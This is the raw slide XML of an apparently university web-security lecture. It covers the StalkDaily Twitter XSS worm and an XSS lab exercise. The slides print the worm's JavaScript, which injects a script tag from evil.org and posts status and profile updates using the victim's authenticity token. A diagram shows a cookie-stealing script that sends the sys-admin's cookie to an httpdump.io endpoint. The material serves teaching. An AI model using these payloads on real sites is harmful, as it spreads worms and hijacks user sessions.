            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>="http://stalkdaily.com"/&gt;&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>="http://evil.org/attack.js”&gt;...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>  where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>attack.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> includes the following attack code   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                                                                                                               </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 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</a:rPr>
              <a:t>update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>urlencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hey everyone, join www.StalkDaily.com.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>");                                         </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ajaxConn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XHConn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>();...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ajaxConn.connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/status/update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>", "POST",           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                 "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>authenticity_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>authtoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>+"&amp;status="+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</a:rPr>
              <a:t>update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>+“                     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                  &amp;tab=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>home&amp;update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=update");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 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</a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>urlencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>('http://stalkdaily.com"&gt;&lt;/a&gt;&lt;script  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="http://evil.org/attack.js"&gt; &lt;/script&gt;&lt;script </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="http://evil.org/attack.js"&gt;&lt;/script&gt;&lt;a '); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ajaxConn1.connect("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/account/settings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>", "POST", </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                 "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>authenticity_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>authtoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>+"&amp;user[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>]="+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>+“    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                  &amp;tab=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>home&amp;update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=update");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Oval Callout 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4932040" y="5517232"/>
            <a:ext cx="4211960" cy="864096"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -45614"/>
              <a:gd name="adj2" fmla="val -57132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1800" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:rPr>
              <a:t>change profile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:rPr>
              <a:t>to include the attack code!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="16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6643687" y="2492896"/>
            <a:ext cx="2500313" cy="500062"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -107847"/>
              <a:gd name="adj2" fmla="val 60805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1800" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:rPr>
              <a:t>tweet the link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6444208" y="260648"/>
            <a:ext cx="2500312" cy="1214437"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -54104"/>
              <a:gd name="adj2" fmla="val 52044"/>
            </a:avLst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sz="1800" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:rPr>
              <a:t>executed when you see this profile</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="228713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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5031306" y="4065219"/>
            <a:ext cx="1638132" cy="1452013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sys admin’s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browser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5031306" y="4046650"/>
            <a:ext cx="1638132" cy="170328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3333CC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3010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Websecurity.cs.ru.nl XSS attacks  (level 5 &amp; 6)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403742" y="980729"/>
            <a:ext cx="8229600" cy="528100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>You have to steal a cookie of the system administrator</a:t>
            </a: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sz="2000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>
              <a:solidFill>
                <a:srgbClr val="0033CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr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sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0033CC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dirty="0">
              <a:solidFill>
                <a:srgbClr val="0033CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"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1800" dirty="0"/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US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Comic Sans MS" pitchFamily="66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</a:pPr>
            <a:endParaRPr lang="en-GB" dirty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4629929-24B6-4ADD-BF3F-73ECBF1983EF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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619243" y="1834044"/>
            <a:ext cx="2881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Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1. malicious input,  with cookie-stealing script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Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3052856" y="2578056"/>
            <a:ext cx="1505382" cy="12293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endParaRPr lang="en-US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200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websecurity</a:t>
            </a:r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. cs.ru.nl</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2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ight Arrow 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1560000">
            <a:off x="1779472" y="2490561"/>
            <a:ext cx="1403036" cy="26759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17" name="Picture 3" descr="C:\Users\erikpoll\Desktop\Alice-PNG-alice-in-wonderland-33922018-444-8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26650" y="4292672"/>
            <a:ext cx="714541" cy="1205341"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6914740" y="5198685"/>
            <a:ext cx="731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Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>amin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23" name="Picture 2" descr="C:\Users\erikpoll\Desktop\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4573" y="1829943"/>
            <a:ext cx="823440" cy="754297"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="912657" y="4669066"/>
            <a:ext cx="1590968" cy="9643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your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  <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>httpdump.io</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="20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endpoint </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000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8" name="Right Arrow 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1560000">
            <a:off x="4288519" y="3850238"/>
            <a:ext cx="1019228" cy="31300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29" name="Staande oorkonde 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371153" y="2778633"/>
            <a:ext cx="1239961" cy="568468"/>
          </a:xfrm>
          <a:prstGeom prst="verticalScrol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script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Staande oorkonde 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5435548" y="4370807"/>
            <a:ext cx="998262" cy="484237"/>
          </a:xfrm>
          <a:prstGeom prst="verticalScrol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script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="CustomShape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5828765" y="3929560"/>
            <a:ext cx="650053" cy="442948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4" name="Right Arrow 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20820000" flipH="1">
            <a:off x="2489186" y="4706519"/>
            <a:ext cx="2992477" cy="212573"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 69757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1807990" y="3918870"/>
            <a:ext cx="2098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latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4. HTTP request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>revealing cookie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3059" y="5151241"/>
            <a:ext cx="449285" cy="365991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9969" y="4551670"/>
            <a:ext cx="449285" cy="365991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4331993" y="3126668"/>
            <a:ext cx="3758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Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2. sys-admin visits the web site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37" name="Right Arrow 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1560000" flipH="1">
            <a:off x="4456828" y="3590299"/>
            <a:ext cx="1030435" cy="27402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38" name="Picture 2" descr="C:\Users\erikpoll\Desktop\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998" y="4370808"/>
            <a:ext cx="696642" cy="638146"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5612098" y="3503928"/>
            <a:ext cx="2207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Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3 . script executes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="Afbeelding 3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2530" y="5548100"/>
            <a:ext cx="449285" cy="365991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Staande oorkonde 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3363323" y="2682014"/>
            <a:ext cx="774253" cy="369979"/>
          </a:xfrm>
          <a:prstGeom prst="verticalScroll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script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31" name="Straight Arrow Connector 31"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4340095" y="3783343"/>
            <a:ext cx="776560" cy="387404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56810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3" grpId="0" animBg="1"/>
      <p:bldP spid="6" grpId="0"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="28" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="30" grpId="0" animBg="1"/>
      <p:bldP spid="24" grpId="0" animBg="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="36" grpId="0"/>
      <p:bldP spid="37" grpId="0" animBg="1"/>
      <p:bldP spid="39" grpId="0"/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b="0" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The power of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
